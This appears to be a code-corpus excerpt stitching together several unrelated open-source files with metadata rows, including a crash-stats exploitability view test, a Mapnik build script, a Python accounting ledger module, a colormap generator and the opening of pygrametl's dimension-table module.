"count": 124,
"facets": {
"exploitability": [
{"count": 120, "term": "none"},
{"count": 1, "term": "high"},
{"count": 4, "term": "interesting"},
]
},
"term": "FakeSignature 3",
},
{
"count": 104,
"facets": {
"exploitability": [
{"count": 93, "term": "low"},
{"count": 11, "term": "medium"},
]
},
"term": "Other Signature",
},
{
"count": 222,
"facets": {
"exploitability": [
# one that doesn't add up to 4
{"count": 10, "term": "null"},
{"count": 20, "term": "none"},
]
},
"term": "FakeSignature",
},
]
return {"facets": {"signature": facets}, "hits": [], "total": 1234}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 302
user = self._login()
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 302
group = self._create_group_with_permission("view_exploitability")
user.groups.add(group)
assert user.has_perm("crashstats.view_exploitability")
# unrecognized product
response = self.client.get(url, {"product": "XXXX"})
assert response.status_code == 404
# unrecognized version
response = self.client.get(url, {"product": "WaterWolf", "version": "0000"})
assert response.status_code == 400
# valid version but not for WaterWolf
response = self.client.get(url, {"product": "WaterWolf", "version": "1.5"})
assert response.status_code == 400
# if you omit the product, it'll redirect and set the default product
response = self.client.get(url)
assert response.status_code == 302
assert response["Location"].endswith(
url + "?product=%s" % settings.DEFAULT_PRODUCT
)
response = self.client.get(url, {"product": "WaterWolf", "version": "19.0"})
assert response.status_code == 200
doc = pyquery.PyQuery(response.content)
# We expect a table with 3 different signatures
# The signature with the highest high+medium count is
# 'Other Signature' etc.
tds = doc("table.data-table tbody td:first-child a")
texts = [x.text for x in tds]
assert texts == ["Other Signature", "FakeSignature 3", "FakeSignature 1"]
# The first signature doesn't have any bug associations,
# but the second and the third does.
rows = doc("table.data-table tbody tr")
texts = [[x.text for x in doc("td.bug_ids_more a", row)] for row in rows]
expected = [[], ["222222222"], ["111111111"]]
assert texts == expected
assert queried_versions == [["19.0"]]
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 200
assert queried_versions == [["19.0"], None]
| mpl-2.0 | -6,342,788,906,215,783,000 | 37.550725 | 87 | 0.509023 | false |
mapycz/mapnik | utils/mapnik-index/build.py | 1 | 2028 | #
# This file is part of Mapnik (c++ mapping toolkit)
#
# Copyright (C) 2015 Artem Pavlenko
#
# Mapnik is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
#
import os
import glob
from copy import copy
Import ('env')
Import ('plugin_base')
program_env = plugin_base.Clone()
source = Split(
"""
mapnik-index.cpp
process_csv_file.cpp
process_geojson_file.cpp
../../plugins/input/csv/csv_utils.cpp
"""
)
headers = env['CPPPATH']
libraries = [env['MAPNIK_NAME']]
# need on linux: https://github.com/mapnik/mapnik/issues/3145
libraries.append('mapnik-json')
libraries.append('mapnik-wkt')
libraries.append(env['ICU_LIB_NAME'])
libraries.append(env['BOOST_LIB_PATHS']['system'])
libraries.append(env['BOOST_LIB_PATHS']['program_options'])
if env['RUNTIME_LINK'] == 'static':
libraries.extend(copy(env['LIBMAPNIK_LIBS']))
if env['PLATFORM'] == 'Linux':
libraries.append('dl')
mapnik_index = program_env.Program('mapnik-index', source, CPPPATH=headers, LIBS=libraries)
Depends(mapnik_index, env.subst('../../src/%s' % env['MAPNIK_LIB_NAME']))
if 'uninstall' not in COMMAND_LINE_TARGETS:
env.Install(os.path.join(env['INSTALL_PREFIX'],'bin'), mapnik_index)
env.Alias('install', os.path.join(env['INSTALL_PREFIX'],'bin'))
env['create_uninstall_target'](env, os.path.join(env['INSTALL_PREFIX'],'bin','mapnik-index'))
| lgpl-2.1 | 6,641,049,399,856,726,000 | 31.190476 | 93 | 0.711045 | false |
ashishb/benchmarking | serialization/exec_thrift.py | 1 | 1364 | import os
import random
import sys
sys.path.append(os.path.join(os.getcwd(), 'gen-py'))
from thrift.protocol import TBinaryProtocol
from thrift.transport import TTransport
# Generated using
# thrift -o . --gen py:new_style student.thrift
from student.ttypes import Course
from student.ttypes import Student
# Based on http://wiki.apache.org/thrift/ThriftUsagePython
def getNewStudent(i, num_courses):
new_student = Student()
new_student.id = random.randint(0, i)
new_student.first_name = str(random.randint(0, i))
new_student.last_name = str(random.randint(0, i))
new_student.comments = str(random.randint(0, i))
new_student.courses = list()
for j in xrange(0, num_courses):
new_course = Course()
new_course.name = str(random.randint(0, i)) + str(random.randint(0, j))
new_course.marks = 100 * random.randint(0, j) / num_courses
new_student.courses.append(new_course)
return new_student
def serialize(student):
student.validate()
transport_out = TTransport.TMemoryBuffer()
protocol_out = TBinaryProtocol.TBinaryProtocol(transport_out)
student.write(protocol_out)
bytes = transport_out.getvalue()
return bytes
def deserialize(serialized_student):
transport_in = TTransport.TMemoryBuffer(serialized_student)
protocol_in = TBinaryProtocol.TBinaryProtocol(transport_in)
student = Student()
student.read(protocol_in)
return student
| apache-2.0 | -2,492,919,796,256,315,400 | 29.311111 | 73 | 0.756598 | false |
tedlaz/pyted | pylogistiki/book.py | 1 | 17624 | '''Basic module for accounting'''
import utils as ul
import parse_singularo_afm as pafm
FORMAT_LINE = '%-15s %12s %12s'
SPLIT_CHAR = '.'
LM1 = ul.read_txt_to_dict('log_sxedio.txt')
def parse_afm_5398(file='afm-5398.txt'):
afmdic = {}
pfpadic = {}
with open(file) as fle:
for line in fle:
lmos, afm, pfpa, _ = line.split('|')
afmdic[lmos] = afm
pfpadic[lmos] = ul.dec(ul.dec(pfpa) / ul.dec(100))
return afmdic, pfpadic
def date2period(isodate):
year, month, _ = isodate.split('-')
imonth = int(month)
if imonth <= 3:
return '%s-%s-%s' % (year, '03', '31')
elif imonth <= 6:
return '%s-%s-%s' % (year, '06', '30')
elif imonth <= 9:
return '%s-%s-%s' % (year, '09', '30')
elif imonth <= 12:
return '%s-%s-%s' % (year, '12', '31')
else:
return '%s-%s-%s' % (year, '12', '31')
class Line():
def __init__(self, lmo, xre, pis):
assert xre + pis != 0
self.lmo = lmo
self.xre = ul.dec(xre)
self.pis = ul.dec(pis)
def lmop(self, lmodic):
return lmodic.get(self.lmo, self.lmo)
@property
def typos(self):
typ = set()
if self.lmo.startswith('1'):
typ.add('ΠΑΓΙΑ')
typ.add('ΕΕ')
typ.add('1')
if self.lmo.startswith('2'):
typ.add('ΑΠΟΘΕΜΑΤΑ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΞΟΔΑ')
typ.add('2')
if self.lmo.startswith('20'):
typ.add('ΕΜΠΟΡΕΥΜΑΤΑ')
if self.lmo.startswith('20.00'):
typ.add('ΑΠΟΓΡΑΦΗ ΕΜΠΟΡΕΥΜΑΤΩΝ')
if self.lmo.startswith('20.01'):
typ.add('ΑΓΟΡΕΣ ΕΜΠΟΡΕΥΜΑΤΩΝ')
typ.add('ΑΓΟΡΕΣ')
if self.lmo.startswith('24.01'):
typ.add("ΑΓΟΡΕΣ Α' ΚΑΙ Β' ΥΛΩΝ")
typ.add('ΑΓΟΡΕΣ')
if self.lmo.startswith('3'):
typ.add('ΑΠΑΙΤΗΣΕΙΣ')
typ.add('3-5')
if self.lmo.startswith('38'):
typ.add('ΜΕΤΡΗΤΑ')
if self.lmo.startswith('4'):
typ.add('ΚΕΦΑΛΑΙΟ')
if self.lmo.startswith('5'):
typ.add('ΥΠΟΧΡΕΩΣΕΙΣ')
typ.add('3-5')
if self.lmo.startswith('50'):
typ.add('ΠΡΟΜΗΘΕΥΤΕΣ')
if self.lmo.startswith('54.00'):
typ.add('ΦΠΑ')
typ.add('54.00')
if self.lmo.startswith('6'):
typ.add('ΕΞΟΔΑ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΞΟΔΑ')
typ.add('6')
if self.lmo.startswith('7'):
typ.add('ΕΣΟΔΑ')
typ.add('ΠΩΛΗΣΕΙΣ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΣΟΔΑ')
typ.add('7')
if self.lmo.startswith('70'):
typ.add('ΠΩΛΗΣΕΙΣ ΕΜΠΟΡΕΥΜΑΤΩΝ')
if self.lmo.startswith('71'):
typ.add('ΠΩΛΗΣΕΙΣ ΠΡΟΪΟΝΤΩΝ')
if self.lmo.startswith('8'):
typ.add('ΑΝΟΡΓΑΝΑ')
return typ
def is_typos(self, typos):
return typos in self.typos
def has_tag(self, tag):
return tag in self.typos
@property
def is_xreostiko(self):
return self.y > 0
@property
def y(self):
return self.xre - self.pis
@property
def gy(self):
return ul.dec2gr(self.y)
@property
def gxre(self):
return ul.dec2gr(self.xre)
@property
def gpis(self):
return ul.dec2gr(self.pis)
@property
def hierarchy(self):
assert len(self.lmo) > 1
listlmo = self.lmo.split(SPLIT_CHAR)
listfinal = ['t']
if self.lmo[0] in '267':
listfinal.append('t267')
elif self.lmo[0] in '35':
listfinal.append('t35')
listfinal.append(self.lmo[0])
tmp = ''
for el in listlmo:
if tmp == '':
tmp = el
else:
tmp = SPLIT_CHAR.join([tmp, el])
listfinal.append(tmp)
return listfinal
def __str__(self):
return FORMAT_LINE % (self.lmo, self.gxre, self.gpis)
class Arthro():
def __init__(self, dat, par, per, lines=None):
self.dat = dat
self.par = par
self.per = per
if lines:
self.z = lines
else:
self.z = []
def similarities(self):
'''Find similarities between accounts'''
print(', '.join([lm.lmo for lm in self.z]))
@property
def typos(self):
tset = set()
for line in self.z:
tset = tset.union(line.typos)
# if {'ΦΠΑ', 'ΑΓΟΡΕΣ'}.issubset(tset):
# tset.add('ΑΓΟΡΕΣ ΜΕ ΦΠΑ')
# if {'ΑΓΟΡΕΣ', 'ΠΡΟΜΗΘΕΥΤΕΣ'}.issubset(tset):
# tset.add('ΑΓΟΡΕΣ ΕΠΙ ΠΙΣΤΩΣΕΙ')
return tset
@property
def ee_typos(self):
if 'ΕΕ ΕΣΟΔΑ' in self.typos:
return '7'
elif 'ΕΕ ΕΞΟΔΑ' in self.typos:
return '26'
elif '1' in self.typos:
return '1'
else:
return 'ΛΑΘΟΣ'
@property
def ee_synt(self):
if 'ΕΕ ΕΣΟΔΑ' in self.typos:
return ul.dec(-1)
elif 'ΕΕ ΕΞΟΔΑ' in self.typos:
return ul.dec(1)
elif '1' in self.typos:
return ul.dec(1)
else:
return ul.dec(0)
def is_typos(self, typos):
return typos in self.typos
@property
def lmoi(self):
'''List with arthro lmoi'''
return [line.lmo for line in self.z]
@property
def zlines(self):
'''Number of lines'''
return len(self.z)
def add(self, line):
self.z.append(line)
@property
def val(self):
return sum([line.xre for line in self.z])
@property
def is_complete(self):
total = sum([line.y for line in self.z])
abstotal = sum([abs(line.y) for line in self.z])
return total == 0 and abstotal > 0
def __str__(self):
ast = '%s %s %s\n' % (self.dat, self.par, self.per)
txr = tpi = ul.dec(0)
for line in self.z:
ast += ' %s\n' % line
txr += line.xre
tpi += line.pis
ast += ' ' + FORMAT_LINE % ('Σύνολο', txr, tpi)
return ast
class Book():
def __init__(self, lmoi=None, arthra=None):
# self.lmoi = lmoi
self.lmoi = {**lmoi, **LM1}
self.arthra = arthra
def add_arthro(self, arthro):
self.arthra.append(arthro)
for lmo in arthro.lmoi:
if lmo not in self.lmoi:
self.lmoi[lmo] = {}
@property
def typoi(self):
typoi = set()
for arthro in self.arthra:
typoi = typoi.union(arthro.typos)
return typoi
def isozygio(self, apo, eos, typos=None):
isoz = {}
for arthro in self.arthra:
if not apo <= arthro.dat <= eos:
continue
if typos and not arthro.is_typos(typos):
continue
for line in arthro.z:
for lmo in line.hierarchy:
isoz[lmo] = isoz.get(lmo, ul.dec(0)) + line.y
return isoz
def isozygio_print(self, apo, eos, typos=None):
isoz = self.isozygio(apo, eos, typos)
tst = '%-20s %-50s %12s'
print('Ισοζύγιο από %s έως %s %s' % (apo, eos, typos or 'ΟΛΑ'))
for lmo in sorted(isoz):
print(tst % (lmo, self.lmoi.get(lmo, lmo), isoz[lmo]))
def kartella(self, lmos, apo, eos):
fdata = []
total = ul.dec(0)
before = ul.dec(0)
after = ul.dec(0)
for arthro in self.arthra:
for line in arthro.z:
if lmos in line.hierarchy:
if arthro.dat < apo:
before += line.y
elif arthro.dat > eos:
after += line.y
else:
total += line.y
fdata.append((arthro.dat, arthro.par, arthro.per,
line.xre, line.pis, total))
return fdata, before, after
def kartella_print(self, lmos, apo, eos):
data, before, after = self.kartella(lmos, apo, eos)
ast = 'Καρτέλλα Λογαριασμού %s %s (Άπό: %s Έως: %s)'
print(ast % (lmos, self.lmoi[lmos], apo, eos))
print('%-139s %12s' % ('Υπόλοιπο από μεταφορά', before))
for dat in data:
# print(len(dat[2]))
print('%-10s %-26s %-75s %12s %12s %12s' % dat)
def fpa(self, apo, eos):
'''
1.Επιλέγουμε τα άρθρα που έχουν φπα
2.Ελέγχουμε αν υπάρχουν παραπάνω από ένας γραμμές με φπα
Στην απλή περίπτωση που έχουμε ένα μια γραμμή ΦΠΑ και μια γραμμή
1267 τότε βρίσκουμε το ποσοστό κάνοντας διάρεση φπα 54.00 / 1267
το ποσοστό θα πρέπει να είναι ένα απο τα γνωστά ποσοστά 13, 24
προσθέτουμε το λογαρισμό στην κατηγορία που πρέπει
'''
pass
def arthra_print(self, typos=None):
headt = "%-6s %-10s %s %s %s"
lit = " %-12s %-40s %12s %12s"
i = 0
for art in self.arthra:
if typos and typos not in art.typos:
continue
i += 1
print(headt % (i, art.dat, art.par, art.per, art.typos))
for lin in art.z:
print(lit % (lin.lmo, self.lmoi.get(lin.lmo, lin.lmo),
lin.xre, lin.pis))
print('')
def eebook(self):
i = 0
lins = []
for art in self.arthra:
if 'ΕΕ' not in art.typos:
continue
i += 1
poso = ul.dec(0)
fpa = ul.dec(0)
lmo = ''
for line in art.z:
if '54.00' in line.typos:
fpa += ul.dec(line.y * art.ee_synt)
elif '1' in line.typos:
poso += ul.dec(line.xre * art.ee_synt)
elif '2' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '6' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '7' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '3-5' in line.typos:
lmo = line.lmo
else:
pass
lins.append({'aa': i, 'date': art.dat, 'typ': art.ee_typos,
'par': art.par, 'per': art.per, 'poso': poso,
'fpa': fpa, 'tot': art.val, 'lmo': lmo})
return lins
def eebook_print(self, eefile):
afms = pafm.parsefile(eefile)
a5398, _ = parse_afm_5398()
l5398 = []
eedata = self.eebook()
stc = ('{aa:<5}{date} {typ:2} {lmo:12} {par:22} {afm:9} {per:30} {es:12}'
'{esf:12} {est:12} {ej:12} {ejf:12} {ejt:12}')
te = ul.dec(0)
tj = ul.dec(0)
total_paroxi = 0
for line in eedata:
line['per'] = line['per'][:30] if len(line['per']) > 29 else line['per']
per_name = line['per'][:14] if len(line['per']) > 14 else line['per']
per_name = per_name.split('-')[0].strip()
line['afm'] = afms[per_name] if per_name in afms else ''
if line['lmo'].startswith('53.98.'):
line['afm'] = a5398.get(line['lmo'], ' ??? ')
if line['lmo'] not in l5398:
if line['lmo'] not in a5398:
l5398.append(line['lmo'])
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΛΙΑΝΙΚΗΣ ΠΩΛΗΣΗΣ'):
line['afm'] = '1'
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΩΝ'):
line['afm'] = ' ? '
total_paroxi += 1
if line['typ'] == '7':
line['es'] = line['poso']
line['ej'] = '' # ul.dec(0)
line['esf'] = line['fpa']
line['ejf'] = '' # ul.dec(0)
te += line['poso']
line['te'] = te
line['tj'] = '' # tj
line['est'] = line['tot']
line['ejt'] = ''
else:
line['es'] = '' # ul.dec(0)
line['ej'] = line['poso']
line['esf'] = '' # ul.dec(0)
line['ejf'] = line['fpa']
tj += line['poso']
line['te'] = '' # te
line['tj'] = tj
line['est'] = ''
line['ejt'] = line['tot']
print(stc.format(**line))
l5398.sort()
if l5398:
print('Λογαριασμοί που λείπουν ΑΦΜ:', l5398)
print('Esoda : %s Ejoda : %s paroxi: %s' % (te, tj, total_paroxi))
def eebook_myf(self, eefile):
afms = pafm.parsefile(eefile)
a5398, pfpa5398 = parse_afm_5398()
l5398 = []
eedata = self.eebook()
te = ul.dec(0)
tj = ul.dec(0)
total_paroxi = 0
lines = []
for line in eedata:
line['mdate'] = date2period(line['date'])
line['per'] = line['per'][:30] if len(line['per']) > 29 else line['per']
per_name = line['per'][:14] if len(line['per']) > 14 else line['per']
per_name = per_name.split('-')[0].strip()
line['afm'] = afms[per_name] if per_name in afms else ''
if line['lmo'].startswith('53.98.'):
line['afm'] = a5398.get(line['lmo'], ' ??? ')
if line['lmo'] not in l5398:
if line['lmo'] not in a5398:
l5398.append(line['lmo'])
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΛΙΑΝΙΚΗΣ ΠΩΛΗΣΗΣ'):
line['afm'] = '1'
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΩΝ'):
line['afm'] = ' ? '
total_paroxi += 1
if line['typ'] == '7':
line['es'] = line['poso']
line['ej'] = '' # ul.dec(0)
line['esf'] = line['fpa']
line['ejf'] = '' # ul.dec(0)
te += line['poso']
line['te'] = te
line['tj'] = '' # tj
line['est'] = line['tot']
line['ejt'] = ''
if line['afm'] == '1':
line['myft'] = '3cash'
elif line['afm']:
line['myft'] = '1rev'
else:
line['myft'] = ' rev '
else:
line['es'] = '' # ul.dec(0)
line['ej'] = line['poso']
line['esf'] = '' # ul.dec(0)
line['ejf'] = line['fpa']
tj += line['poso']
line['te'] = '' # te
line['tj'] = tj
line['est'] = ''
line['ejt'] = line['tot']
if line['afm'].strip():
line['myft'] = '2exp'
elif line['lmo'].startswith('53.98.'):
line['myft'] = '4oexp'
else:
line['myft'] = 'exp'
if line['fpa'] != 0:
print('Error', line)
if line['poso'] < 0:
line['decr'] = 'credit'
line['mposo'] = -1 * line['poso']
line['mfpa'] = -1 * line['fpa']
else:
line['decr'] = 'normal'
line['mposo'] = line['poso']
line['mfpa'] = line['fpa']
if line['mfpa'] == 0 and line['lmo'] in pfpa5398:
poso = ul.dec(line['mposo'] / (1 + pfpa5398[line['lmo']]))
fpa = line['mposo'] - poso
line['mposo'] = poso
line['mfpa'] = fpa
lines.append(line)
l5398.sort()
if l5398:
print('Λογαριασμοί που λείπουν ΑΦΜ:', l5398)
return lines
def myf(self, lines):
pass
def eebook_totals(self, apo, eos):
eedata = self.eebook()
eposo = efpa = xposo = xfpa = ul.dec(0)
for line in eedata:
if not (apo <= line['date'] <= eos):
continue
if line['typ'] == '7':
eposo += line['poso']
efpa += line['fpa']
elif line['typ'] in ('26', '1'):
xposo += line['poso']
xfpa += line['fpa']
else:
print('Error')
print('Σύνολα για περίοδο από %s έως %s' % (apo, eos))
print('Έσοδα : %15s ΦΠΑ: %15s' % (eposo, efpa))
print('Έξοδα : %15s ΦΠΑ: %15s' % (xposo, xfpa))
print('Διαφορά: %15s %15s' % (eposo - xposo, efpa - xfpa))
def __str__(self):
stf = ''
for arthro in self.arthra:
stf += '%s\n' % arthro.__str__()
return stf
| gpl-3.0 | -1,884,717,183,715,299,000 | 31.927451 | 84 | 0.450009 | false |
leobrowning92/generative-art | colormap.py | 1 | 3108 | import os
import cairo as cairo
import numpy as np
from render import Animate, Image_Creator
import matplotlib.cm as cm
def random_rgb_color(alpha=1):
return [np.random.uniform(0,1),np.random.uniform(0,1), np.random.uniform(0,1),alpha]
def linear_gradient(start,finish,n=10,alpha=1):
gradient=[0]*n
gradient[0]=start
for i in range(1,n):
gradient[i]=[start[j]+i*(finish[j]-start[j])/float(n) for j in range(3)]+[alpha]
return gradient
def polylinear_gradient(colors,spacing,total_steps,alpha=1):
"""colors is a list of rgb colors, with spacing being the
relative positions of the colors along the gradientself.
spacings are thus sequential numbers between 0 and 1
where the first and last items must be 0 and 1 respectively"""
assert len(colors)==len(spacing), "every color must have a corresponding spacing"
assert total_steps>=2*len(colors) #soft cap on num of colors wrt n
gradient=[]
for i in range(len(colors)-1):
gradient= gradient + linear_gradient(colors[i], colors[i+1], spacing[i+1] -spacing[i],alpha=alpha )
assert len(gradient)==total_steps
return gradient
def hex_to_rgb(hex):
return [int(hex[i:i+2]) for i in range(1,6,2)]
def random_colormap(number_of_colors,total_steps, even=True,v=True,alpha=1):
colors=[]
spacing=[0]
for i in range(number_of_colors):
colors.append(random_rgb_color(alpha=alpha))
if even:
spacing=np.linspace(0,total_steps,num=number_of_colors,dtype=int)
else:
for i in range(number_of_colors-2):
spacing.append(np.random.uniform(0.01,0.99))
spacing.append(1)
if v:
print("colors:")
for i in colors:
print(*i)
print("spacing:\n", *sorted(spacing))
return polylinear_gradient(colors,sorted(spacing),total_steps,alpha=alpha)
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.realpath(__file__)))
# These are the required arguments for the Animation
background_color = [1, 1, 1, 1]
image_size = [200,200]
unit=1.0/max(image_size)
total_steps=max(image_size)
#foreground_colors=linear_gradient([.5,0,.5],[1,1,0],n=image_size)
#foreground_colors=random_colormap(3,total_steps,even=False)
colors=np.genfromtxt(fname='sourceimages/IMG_9308_kmean6.dat',skip_header=1,delimiter=',')
foreground_colors=polylinear_gradient(colors,np.linspace(0,total_steps,num=len(colors),dtype=int) ,total_steps)
def step_function(self):
# render.clear_canvas()
self.line([self.steps*unit,0],[self.steps*unit,1],width=unit)
return True
show=True
if show:
# These are the bits that need to be run when calling the Animation
render = Animate(image_size, background_color, foreground_colors, step_function, interval=100, save=False, stop=total_steps)
render.start()
else:
#this is what needs to be run to produce an image without animation
image=Image_Creator(image_size, background_color, foreground_colors, step_function, stop=total_steps)
image.create()
| gpl-3.0 | 146,574,262,081,108,060 | 34.318182 | 132 | 0.67278 | false |
rocky/python2-trepan | test/unit/test-lib-file.py | 1 | 1030 | #!/usr/bin/env python
'Unit test for trepan.lib.file'
import os, stat, sys, tempfile, unittest
from trepan.lib import file as Mfile
class TestLibFile(unittest.TestCase):
def test_lookupmodule(self):
m, f = Mfile.lookupmodule('os.path')
self.assertTrue(f)
self.assertTrue(m)
m, f = Mfile.lookupmodule(__file__)
self.assertTrue(f)
self.assertEqual(None, m)
self.assertEqual((None, None), Mfile.lookupmodule('fafdsafdsa'))
return
if sys.platform != 'win32':
def test_readable(self):
self.assertFalse(Mfile.readable('fdafdsa'))
for mode, can_read in [(stat.S_IRUSR, True),
(stat.S_IWUSR, False)]:
f = tempfile.NamedTemporaryFile()
os.chmod(f.name, mode)
self.assertEqual(can_read, Mfile.readable(f.name))
f.close()
pass
return
pass
pass
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 7,782,893,350,148,697,000 | 27.611111 | 72 | 0.553398 | false |
buxx/synergine | synergine/core/config/ConfigurationManager.py | 1 | 2347 | from synergine.core.exception.NotFoundError import NotFoundError
class ConfigurationManager():
"""
Management of dict based configuration data
"""
def __init__(self, config: dict={}):
self._configs = config
def get(self, config_name: "the.config.name", default=None):
inceptions = config_name.split('.')
config = self._configs
for inception in inceptions:
if inception in config:
config = config[inception]
elif default is not None:
return default
else:
raise NotFoundError('Config "'+config_name+'"" not found')
return config
def update_config(self, config_name: "the.config.name", config_value):
inceptions = config_name.split('.')
inception_count = 0
parent_config = self._configs
config = self._configs
for inception in inceptions:
inception_count += 1
if inception in config:
parent_config = config
config = config[inception]
else:
raise Exception('Config "'+config_name+'"" not found')
parent_config[inception] = config_value
def set_config(self, config_name: "the.config.name", config_value):
inceptions = config_name.split('.')
config = self._configs
for inception in inceptions:
if inception in config:
config = config[inception]
elif inceptions.index(inception)+1 == len(inceptions):
config[inception] = config_value
else:
config[inception] = {inceptions.__getitem__(inceptions.index(inception)+1): {}}
config = config[inception]
def load(self, config_to_load):
self._configs = self._merge(self._configs, config_to_load)
def _merge(self, a, b, path=None):
"merges b into a"
if path is None:
path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
self._merge(a[key], b[key], path + [str(key)])
elif a[key] == b[key]:
pass
else:
a[key] = b[key]
else:
a[key] = b[key]
return a | apache-2.0 | -4,210,175,498,560,973,300 | 34.044776 | 95 | 0.536003 | false |
jpercent/pygrametl | pygrametl/tables.py | 1 | 122529 | """This module contains classes for looking up rows, inserting rows
and updating rows in dimensions and fact tables. Rows are represented
as dictionaries mapping between attribute names and attribute values.
Many of the class methods take an optional 'namemapping' argument which is
explained here, but not repeated in the documentation for the individual
methods: Consider a method m which is given a row r and a namemapping n.
Assume that the method m uses the attribute a in r (i.e., r[a]). If the
attribute a is not in the namemapping, m will just use r[a] as expected.
But if the attribute a is in the namemapping, the name a is mapped to
another name and the other name is used. That means that m then uses
r[n[a]]. This is practical if attribute names in the considered rows and
DW tables differ. If, for example, data is inserted into an order dimension
in the DW that has the attribute order_date, but the source data uses the
attribte name date, we can use a name mapping from order_date to date:
dim.insert(row=..., namemapping={'order_date':'date'})
"""
# Copyright (c) 2009-2015, Aalborg University ([email protected])
# All rights reserved.
# Redistribution and use in source anqd binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import locale
from subprocess import Popen, PIPE
from sys import version_info
import tempfile
from time import sleep
import types
import pygrametl
from pygrametl.FIFODict import FIFODict
import pygrametl.parallel
try:
from functools import reduce
except ImportError:
# Jython 2.5.X specific code
pass
__author__ = "Christian Thomsen"
__maintainer__ = "Christian Thomsen"
__version__ = '2.4.0a'
__all__ = ['Dimension', 'CachedDimension', 'BulkDimension',
'CachedBulkDimension', 'TypeOneSlowlyChangingDimension',
'SlowlyChangingDimension', 'SnowflakedDimension', 'FactTable',
'BatchFactTable', 'BulkFactTable', 'SubprocessFactTable',
'DecoupledDimension', 'DecoupledFactTable', 'BasePartitioner',
'DimensionPartitioner', 'FactTablePartitioner']
class Dimension(object):
"""A class for accessing a dimension. Does no caching."""
def __init__(self, name, key, attributes, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
if not type(key) in pygrametl._stringtypes:
raise ValueError("Key argument must be a string")
if not len(attributes):
raise ValueError("No attributes given")
if targetconnection is None:
targetconnection = pygrametl.getdefaulttargetconnection()
if targetconnection is None:
raise ValueError("No target connection available")
self.targetconnection = targetconnection
self.name = name
self.attributes = attributes
self.key = key
self.all = [key, ]
self.all.extend(attributes)
if lookupatts == ():
lookupatts = attributes
elif not len(lookupatts):
raise ValueError("Lookupatts contain no attributes")
elif not set(lookupatts) <= set(self.all):
raise ValueError("Lookupatts is not a subset of attributes")
self.lookupatts = lookupatts
self.defaultidvalue = defaultidvalue
self.rowexpander = rowexpander
pygrametl._alltables.append(self)
# Now create the SQL that we will need...
# This gives "SELECT key FROM name WHERE lookupval1 = %(lookupval1)s
# AND lookupval2 = %(lookupval2)s AND ..."
self.keylookupsql = "SELECT " + key + " FROM " + name + " WHERE " + \
" AND ".join(["%s = %%(%s)s" % (lv, lv) for lv in lookupatts])
# This gives "SELECT key, att1, att2, ... FROM NAME WHERE key =
# %(key)s"
self.rowlookupsql = "SELECT " + ", ".join(self.all) + \
" FROM %s WHERE %s = %%(%s)s" % (name, key, key)
# This gives "INSERT INTO name(key, att1, att2, ...)
